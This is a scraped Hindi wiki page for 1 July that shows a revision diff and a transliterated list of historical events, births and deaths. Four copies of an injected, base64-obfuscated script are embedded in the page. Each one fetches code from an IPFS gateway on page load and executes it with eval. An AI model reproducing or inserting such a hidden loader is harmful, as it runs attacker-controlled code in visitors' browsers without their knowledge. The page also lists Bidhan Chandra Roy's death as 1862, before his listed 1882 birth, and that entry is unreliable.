Difference between revisions of "1 जुलाई"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "1862" to "1862")
Line 4: Line 4:
  
 
==1 जुलाई की महत्त्वपूर्ण घटनाएँ==
 
==1 जुलाई की महत्त्वपूर्ण घटनाएँ==
*[[1965]] - 1 जुलाई को भारत और [[पाकिस्तान]] के बीच युद्ध विराम लागू हुआ और विवाद को एक अंतर्राष्ट्रीय न्यायाधिकरण के समक्ष मध्यस्थता के लिए प्रस्तुत किया गया। इस न्यायाधिकरण के फैसले में 1968 में प्रकाशित, 9/10 हिस्सा भारत को और शेष 1/10 हिस्से का अधिकार पाकिस्तान को दिया गया।
+
* 1852 -  1 जुलाई, 1852 को [[सिंध प्रांत|सिन्ध]] के मुख्य आयुक्त सर बर्टलेफ्रोरे द्वारा सिर्फ़ सिंध राज्य में और [[मुंबई]] कराची मार्ग पर प्रयोग के लिए ' सिंध डाक (Scinde Dawk)' नामक डाक टिकट जारी किया गया।
*1852 -  1 जुलाई, 1852 को [[सिंध प्रांत|सिन्ध]] के मुख्य आयुक्त सर बर्टलेफ्रोरे द्वारा सिर्फ़ सिंध राज्य में और [[मुंबई]] कराची मार्ग पर प्रयोग के लिए ' सिंध डाक (Scinde Dawk)' नामक डाक टिकट जारी किया गया।
+
* [[1965]] - 1 जुलाई को भारत और [[पाकिस्तान]] के बीच युद्ध विराम लागू हुआ और विवाद को एक अंतर्राष्ट्रीय न्यायाधिकरण के समक्ष मध्यस्थता के लिए प्रस्तुत किया गया। इस न्यायाधिकरण के फैसले में 1968 में प्रकाशित, 9/10 हिस्सा भारत को और शेष 1/10 हिस्से का अधिकार पाकिस्तान को दिया गया।
 
+
* [[1990]] - पूर्वी एवं पश्चिमी जर्मनी के बीच सीमा रेखा की समाप्ति एवं पश्चिमी जर्मनी की मुद्रा को पूर्वी जर्मनी में मान्यता।
 
==1 जुलाई को जन्मे व्यक्ति==
 
==1 जुलाई को जन्मे व्यक्ति==
 
* [[1882]] - [[बिधान चंद्र राय]] - [[भारत रत्न]] सम्मानित वरिष्ठ चिकित्सक, निर्भीक स्वतंत्रता सेनानी और कुशल राजनीतिज्ञ।  
 
* [[1882]] - [[बिधान चंद्र राय]] - [[भारत रत्न]] सम्मानित वरिष्ठ चिकित्सक, निर्भीक स्वतंत्रता सेनानी और कुशल राजनीतिज्ञ।  
Line 13: Line 13:
  
 
==1 जुलाई को हुए निधन==
 
==1 जुलाई को हुए निधन==
* 1862 - [[बिधान चंद्र राय]] - [[भारत रत्न]] सम्मानित वरिष्ठ चिकित्सक, निर्भीक स्वतंत्रता सेनानी और कुशल राजनीतिज्ञ।
+
* [[1862]] - [[बिधान चंद्र राय]] - [[भारत रत्न]] सम्मानित वरिष्ठ चिकित्सक, निर्भीक स्वतंत्रता सेनानी और कुशल राजनीतिज्ञ।
  
 
==1 जुलाई के महत्त्वपूर्ण अवसर एवं उत्सव==
 
==1 जुलाई के महत्त्वपूर्ण अवसर एवं उत्सव==

Revision as of 10:09, 4 February 2012

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

gregori kailandar ke anusar 1 julaee varsh ka 182 vaan (lip varsh mean yah 183 vaan) din hai. sal mean abhi aur 183 din shesh haian.

1 julaee ki mahattvapoorn ghatanaean

  • 1852 - 1 julaee, 1852 ko sindh ke mukhy ayukt sar bartalephrore dvara sirf siandh rajy mean aur muanbee karachi marg par prayog ke lie ' siandh dak (Scinde Dawk)' namak dak tikat jari kiya gaya.
  • 1965 - 1 julaee ko bharat aur pakistan ke bich yuddh viram lagoo hua aur vivad ko ek aantarrashtriy nyayadhikaran ke samaksh madhyasthata ke lie prastut kiya gaya. is nyayadhikaran ke phaisale mean 1968 mean prakashit, 9/10 hissa bharat ko aur shesh 1/10 hisse ka adhikar pakistan ko diya gaya.
  • 1990 - poorvi evan pashchimi jarmani ke bich sima rekha ki samapti evan pashchimi jarmani ki mudra ko poorvi jarmani mean manyata.

1 julaee ko janme vyakti

1 julaee ko hue nidhan

1 julaee ke mahattvapoorn avasar evan utsav

bahari k diyaan

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>